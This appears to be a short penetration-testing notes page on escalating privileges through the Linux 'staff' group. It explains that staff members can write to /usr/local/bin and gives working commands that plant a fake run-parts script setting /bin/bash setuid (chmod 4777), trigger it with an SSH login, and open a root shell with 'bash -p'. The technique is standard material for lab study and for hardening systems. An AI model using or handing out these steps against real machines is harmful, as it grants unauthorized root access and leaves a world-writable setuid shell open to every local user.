Linux Staff group
Linux staff group, allows users to add local modifications to the system.
Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may "override" the executables in /bin and /usr/bin with the same name).
As staff its possible to write to /usr/local/bin
and /usr/local/sbin
Staff group privilege escalation
To escalate privileges using staff group privileges we create a script and set permissions for /bin/bash to full read, write and execute for owner, group and everyone else using chmod 4777
.
# Create a run-parts script
$ nano /usr/local/bin/run-parts
#! /bin/bash
chmod 4777 /bin/bash
Make the file executable
chmod +x /usr/local/bin/run-parts
Then start a new ssh connection to trigger run-parts
# Run bash in privileged mode as root
$ /bin/bash -p
What is run-parts?
It’s used for managing and running scripts in directories like /etc/cron.daily
, /etc/cron.weekly
, and /etc/cron.hourly
, which are used for scheduled tasks.
Using run-parts
program to get root is possible, because most programs will run run-parts
like with ssh-login and crontab.
Last updated
Was this helpful?